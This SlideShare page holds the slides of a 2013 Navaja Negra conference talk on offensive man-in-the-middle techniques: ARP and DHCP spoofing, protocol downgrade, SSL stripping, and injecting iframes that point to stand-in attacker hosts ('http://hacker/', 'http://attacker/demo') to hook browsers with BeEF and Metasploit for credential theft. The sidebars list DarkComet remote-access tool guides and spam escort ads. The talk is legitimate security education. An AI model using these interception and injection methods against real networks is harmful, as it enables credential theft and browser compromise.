Offensive MitM

•

1 recomendación•2,972 vistas

The document appears to be a presentation on man-in-the-middle attacks. It discusses various techniques for performing man-in-the-middle attacks including ARP spoofing, DHCP spoofing, ICMP redirect, SSL stripping, self-signed certificate attacks, and browser exploitation using tools like BeEF and Metasploit. It also covers passive sniffing, automated analysis of captured traffic, password capturing, and injecting content into users' browsers using plugins for tools like Burp Suite and The Middler. The presentation provides demonstrations of these attacks and encourages questions from the audience.

Tecnología

Offensive Man-in-the-Middle
Navaja Negra - Albacete
Octubre 2013

$ whois jselvi
Jose Selvi
10 years working in Security
Senior Penetration Tester at
SANS Institute Community Instructor
GIAC Security Expert (GSE)
Twitter: @JoseSelvi
Blog: http://www.pentester.es

Disclaimer!
No user was
(very) harmed
in the making
of this speach

Let’s Go!
Man-in-the-Middle 101
The Passive approach
Downgrade Attacks
SSL Bypass
On-the-ﬂy content injection
Cheating up users
Browser exploitation

ARP Spooﬁng

WHO’S THE ROUTER?

I’M THE ROUTER!

DHCP Spooﬁng

I WANT AN IP

YOUR IP IS...

Much more...
DNS Spooﬁng
Port Stealing
STP Mangling
Route Mangling
...

Even Social Engineering...

Protocol Negotiation
|@#|@#|@#|@#|#@
|@#|@#|@#|@#

|@#|@#|#|#@|@#|@#|@#

Downgrade Attack

Y dice “a relaxing
cup of cafe con
leche” la tia...

Calla, calla... que yo les
he dejado dinero...

The SSHv1 Example
I can speak
just v1

I can speak
v1 & v2
Client

Attacker

SSHv1

OK, Let’s
talk SSHv1

Server

Self-Signed Certiﬁcate

Client

HTTPS

Attacker

Server

HTTPS

SSL Strip
http://www.thoughtcrime.org/software/sslstrip/
By Moxie Marlinspike

Transparent proxy
HTTP to HTTPS Gateway
sed ‘s/https/http/g’
Usually all starts with an HTTP connection

SSL Strip
GET / HTTP/1.1
HTTP
Client

Attacker
Server

HTTPS
<body>
<img src=whatever.jpg>
<a href = https://myweb/login>
http://myweb/login>
</body>

SSL Vulnerabilities
BEAST / CRIME
By Juliano Rizzo, Thai Duong
BREACH
By Angel Prado, Neal Harris, Yoel Gluck
Based on compression characteristics before
encryption.
Chosen plaintext attack
It can decrypt secrets (cookie, csrf-token, etc).

Spanish model
Corp.
B

Corp.
C
Corp.
A

Corp.
D

The “K” Factor
<body>
<img src=whatever.jpg>
<iframe src=http://hacker/>
</body>

The Middler
https://code.google.com/p/middler/
By InGuardians
Transparent HTTP & SIP Proxy
Plugin based: Easy & Powerful
IFrame Injection
Last release from July 2009
Some ﬁxes are needed...
but... that is why Python r00l3z :)

Burp Suite / The Middler
GET / HTTP/1.1
HTTP

Attacker

Client

Server

HTTP
<body>
<img src=whatever.jpg>
<iframe src=http://hacker/>
</body>

Burp Suite
http://portswigger.net/burp/
By PortSwigger
General interception proxy
Support transparent proxy
Support match/replace function
Best option if you have the Pro version
If not... you will lose your conﬁguration when closing

BeEF & Metasploit
BeEF: Browser Exploitation Framework
http://beefproject.com/

Metasploit Framework
http://www.metasploit.com/

BeEF & MSF
BeEF
MSF

GOOGLE

<iframe src=
http://attacker/demo
VICTIM

What to do
Fingerprinting
Redirect to another page
Capture NTLM
SMB Relay Attacks
Credential Theft
Request software installation

Browser Vulnerabilities 2012
Internet Explorer: 34
Mozilla Firefox: 99
Google Chrome: 68
Java Plugin: 32
Adobe Flash: 61
Adobe Reader: 25
http://www.gﬁ.com/blog/wp-content/
uploads/2013/02/Most-TargetedApplications-in-2012.jpg

Metasploit Exploitation
MSF

GOOGLE

<iframe src=
http://attacker/demo
VICTIM

Thanks! Questions?
Jose Selvi
http://twitter.com/JoseSelvi
jselvi@s21sec.com
http://www.s21sec.com

jselvi@pentester.es
http://www.pentester.es

Más contenido relacionado

La actualidad más candente

Top X OAuth 2 HacksAntonio Sanso

Bug Bounty for - BeginnersHimanshu Kumar Das

Practical django secuirtyAndy Dai

Bruteforce basic presentation_file - linxidsecconf

"Introduction to Bug Hunting", Yasser AliHackIT Ukraine

Bounty Craft: Bug bounty reports how do they work, @sushihack presents at Nu...HackerOne

Test & Tea : ITSEC testing, manual vs automatedZoltan Balazs

XSS (Cross Site Scripting)Shubham Gupta

Ultimate Guide to Setup DarkComet with NoIPPich Pra Tna

Attacker Ghost Stories - ShmooCon 2014Rob Fuller

Attacking AWS: the full cyber kill chainSecuRing

Javascript Security - Three main methods of defending your MEAN stackRan Bar-Zik

Step by Step on How to Setup DarkCometPich Pra Tna

WordPress Security @ Vienna WordPress + Drupal MeetupVeselin Nikolov

Client-side JavaScript VulnerabilitiesOry Segal

Javascript Securityjgrahamc

Bug Bounty 101Shahee Mirza

Case Study of Django: Web Frameworks that are Secure by DefaultMohammed ALDOUB

JavaScript SecurityJason Harwig

Hta r33SelectedPresentations

La actualidad más candente (20)

Top X OAuth 2 Hacks

Bug Bounty for - Beginners

Practical django secuirty

Bruteforce basic presentation_file - linx

"Introduction to Bug Hunting", Yasser Ali

Bounty Craft: Bug bounty reports how do they work, @sushihack presents at Nu...

Test & Tea : ITSEC testing, manual vs automated

XSS (Cross Site Scripting)

Ultimate Guide to Setup DarkComet with NoIP

Attacker Ghost Stories - ShmooCon 2014

Attacking AWS: the full cyber kill chain

Javascript Security - Three main methods of defending your MEAN stack

Step by Step on How to Setup DarkComet

WordPress Security @ Vienna WordPress + Drupal Meetup

Client-side JavaScript Vulnerabilities

Javascript Security

Bug Bounty 101

Case Study of Django: Web Frameworks that are Secure by Default

JavaScript Security

Hta r33

Similar a Offensive MitM

Cracking Into Embedded Devices - HACK.LU 2K8guest441c58b71

Cisco Connect Toronto 2017 - Security Through The Eyes of a HackerCisco Canada

Kali Linux - FalconerTony Godfrey

[Php Camp]Owasp Php Top5+CsrfBipin Upadhyay

DVWA BruCON Workshoptestuser1223

You wanna crypto in AEMDamien Antipa

Wordpress securityMehmet Ince

Phd III - defending enterprise F _

Cqcon2015Antonio Sanso

How to hide your browser 0-daysZoltan Balazs

Web API SecurityStefaan

Recent Trends in Cyber SecurityAyoma Wijethunga

Modern Web Security, Lazy but Mindful Like a FoxC4Media

Xss is more than a simple threatAvădănei Andrei

Xss is more than a simple threatRomanian Cyber Conference

Wifi Security, or Descending into Depression and DrinkSecurityTube.Net

Evolution Of Web SecurityChris Shiflett

How to secure web applicationsMohammed A. Imran

DrupalCamp London 2017 - Web site insecurity George Boobyer

DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...Fedir RYKHTIK

Similar a Offensive MitM (20)

Cracking Into Embedded Devices - HACK.LU 2K8

Cisco Connect Toronto 2017 - Security Through The Eyes of a Hacker

Kali Linux - Falconer

[Php Camp]Owasp Php Top5+Csrf

DVWA BruCON Workshop

You wanna crypto in AEM

Wordpress security

Phd III - defending enterprise

Cqcon2015

How to hide your browser 0-days

Web API Security

Recent Trends in Cyber Security

Modern Web Security, Lazy but Mindful Like a Fox

Xss is more than a simple threat

Wifi Security, or Descending into Depression and Drink

Evolution Of Web Security

How to secure web applications

DrupalCamp London 2017 - Web site insecurity

DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...

Más de navajanegra

Cryptography: The mathematics of secret codes is a gamenavajanegra

Automated and unified opensource web application testingnavajanegra

Cool Boot: It's cool!navajanegra

El lado oscuro de TOR: La Deep Webnavajanegra

Telephaty: Harness the codenavajanegra

Trash Robotic Router Platform (TRRP)navajanegra

Economías criptográficasnavajanegra

Where is my money? The evolution of Internet fraudnavajanegra

Divulgación del trabajo de la Brigada de Investigación Tecnológicanavajanegra

Adivina quién viene a CDNear esta nochenavajanegra

1100101001001110navajanegra

Anteproyecto del código procesal penal: Análisis Técniconavajanegra

Zeus-R-Usnavajanegra

Fuzzing browsers by generating malformed HTML/HTML5navajanegra

¿Nadie piensa en las DLLs?navajanegra

SDR: Lowcost receiving in radio communicationsnavajanegra

LIOS: a tool for IOS Forensicnavajanegra

A brief introduction to reversing code with OllyDbg and other toolsnavajanegra

HASH COLLISIONS: Welcome to the (un)real World!navajanegra

Show me your intentsnavajanegra

Más de navajanegra (20)

Cryptography: The mathematics of secret codes is a game

Automated and unified opensource web application testing

Cool Boot: It's cool!

El lado oscuro de TOR: La Deep Web

Telephaty: Harness the code

Trash Robotic Router Platform (TRRP)

Economías criptográficas

Where is my money? The evolution of Internet fraud

Divulgación del trabajo de la Brigada de Investigación Tecnológica

Adivina quién viene a CDNear esta noche

1100101001001110

Anteproyecto del código procesal penal: Análisis Técnico

Zeus-R-Us

Fuzzing browsers by generating malformed HTML/HTML5

¿Nadie piensa en las DLLs?

SDR: Lowcost receiving in radio communications

LIOS: a tool for IOS Forensic

A brief introduction to reversing code with OllyDbg and other tools

HASH COLLISIONS: Welcome to the (un)real World!

Show me your intents

Último

IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge

A Call to Action for Generative AI in 2024Results

🐬 The future of MySQL is Postgres 🐘RTylerCroy

08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls

Histor y of HAM Radio presentation slidevu2urc

08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls

Advantages of Hiring UIUX Design Service Providers for Your BusinessPixlogix Infotech

Artificial Intelligence: Facts and MythsJoaquim Jorge

Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung

EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science

From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software

08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls

Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer

2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong

Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays

Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo

Presentation on how to chat with PDF using ChatGPT code interpreternaman860154

Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2

Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun

TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc

Offensive MitM

1. Offensive Man-in-the-Middle Navaja Negra - Albacete Octubre 2013

2. $ whois jselvi Jose Selvi 10 years working in Security Senior Penetration Tester at SANS Institute Community Instructor GIAC Security Expert (GSE) Twitter: @JoseSelvi Blog: http://www.pentester.es

3. Disclaimer! No user was (very) harmed in the making of this speach

4. Let’s Go! Man-in-the-Middle 101 The Passive approach Downgrade Attacks SSL Bypass On-the-ﬂy content injection Cheating up users Browser exploitation

5. Man-in-the-Middle

6. Man-in-the-Middle

7. ARP Spooﬁng WHO’S THE ROUTER? I’M THE ROUTER!

8. DHCP Spooﬁng I WANT AN IP YOUR IP IS...

9. ICMP Redirect A NEW ROUTE FOR YOU

10. Much more... DNS Spooﬁng Port Stealing STP Mangling Route Mangling ... Even Social Engineering...

11. Let’s Go! Man-in-the-Middle 101 The Passive approach Downgrade Attacks SSL Bypass On-the-ﬂy content injection Cheating up users Browser exploitation

12. Just Snifﬁng...

13. Automated Analysis

14. Password Capture

15. Let’s Go! Man-in-the-Middle 101 The Passive approach Downgrade Attacks SSL Bypass On-the-ﬂy content injection Cheating up users Browser exploitation

16. Protocol Negotiation |@#|@#|@#|@#|#@ |@#|@#|@#|@# |@#|@#|#|#@|@#|@#|@#

17. Downgrade Attack Y dice “a relaxing cup of cafe con leche” la tia... Calla, calla... que yo les he dejado dinero...

18. The SSHv1 Example I can speak just v1 I can speak v1 & v2 Client Attacker SSHv1 OK, Let’s talk SSHv1 Server

19. Let’s Go! Man-in-the-Middle 101 The Passive approach Downgrade Attacks SSL Bypass On-the-ﬂy content injection Cheating up users Browser exploitation

20. Self-Signed Certiﬁcate Client HTTPS Attacker Server HTTPS

21. SSL Strip http://www.thoughtcrime.org/software/sslstrip/ By Moxie Marlinspike Transparent proxy HTTP to HTTPS Gateway sed ‘s/https/http/g’ Usually all starts with an HTTP connection

22. SSL Strip GET / HTTP/1.1 HTTP Client Attacker Server HTTPS <body> <img src=whatever.jpg> <a href = https://myweb/login> http://myweb/login> </body>

23. DEMO

24. SSL Vulnerabilities BEAST / CRIME By Juliano Rizzo, Thai Duong BREACH By Angel Prado, Neal Harris, Yoel Gluck Based on compression characteristics before encryption. Chosen plaintext attack It can decrypt secrets (cookie, csrf-token, etc).

25. Let’s Go! Man-in-the-Middle 101 The Passive approach Downgrade Attacks SSL Bypass On-the-ﬂy content injection Cheating up users Browser exploitation

26. Spanish model Corp. B Corp. C Corp. A Corp. D

27. The “K” Factor <body> <img src=whatever.jpg> <iframe src=http://hacker/> </body>

28. The Middler https://code.google.com/p/middler/ By InGuardians Transparent HTTP & SIP Proxy Plugin based: Easy & Powerful IFrame Injection Last release from July 2009 Some ﬁxes are needed... but... that is why Python r00l3z :)

29. The Middler Plugins

30. Burp Suite / The Middler GET / HTTP/1.1 HTTP Attacker Client Server HTTP <body> <img src=whatever.jpg> <iframe src=http://hacker/> </body>

31. Burp Suite http://portswigger.net/burp/ By PortSwigger General interception proxy Support transparent proxy Support match/replace function Best option if you have the Pro version If not... you will lose your conﬁguration when closing

32. Burp Suite

33. DEMO

34. Let’s Go! Man-in-the-Middle 101 The Passive approach Downgrade Attacks SSL Bypass On-the-ﬂy content injection Cheating up users Browser exploitation

35. BeEF & Metasploit BeEF: Browser Exploitation Framework http://beefproject.com/ Metasploit Framework http://www.metasploit.com/

36. BeEF & MSF BeEF MSF GOOGLE <iframe src= http://attacker/demo VICTIM

37. What to do Fingerprinting Redirect to another page Capture NTLM SMB Relay Attacks Credential Theft Request software installation

38. DEMO

39. Let’s Go! Man-in-the-Middle 101 The Passive approach Downgrade Attacks SSL Bypass On-the-ﬂy content injection Cheating up users Browser exploitation

40. Browser Vulnerabilities 2012 Internet Explorer: 34 Mozilla Firefox: 99 Google Chrome: 68 Java Plugin: 32 Adobe Flash: 61 Adobe Reader: 25 http://www.gﬁ.com/blog/wp-content/ uploads/2013/02/Most-TargetedApplications-in-2012.jpg

41. Metasploit Exploitation MSF GOOGLE <iframe src= http://attacker/demo VICTIM

42. DEMO

43. Let’s Go! Man-in-the-Middle 101 The Passive approach Downgrade Attacks SSL Bypass On-the-ﬂy content injection Cheating up users Browser exploitation

44. Thanks! Questions? Jose Selvi http://twitter.com/JoseSelvi jselvi@s21sec.com http://www.s21sec.com jselvi@pentester.es http://www.pentester.es

Offensive MitM

Recomendados

Recomendados

Más contenido relacionado

La actualidad más candente

La actualidad más candente (20)

Similar a Offensive MitM

Similar a Offensive MitM (20)

Más de navajanegra

Más de navajanegra (20)

Último

Último (20)

Offensive MitM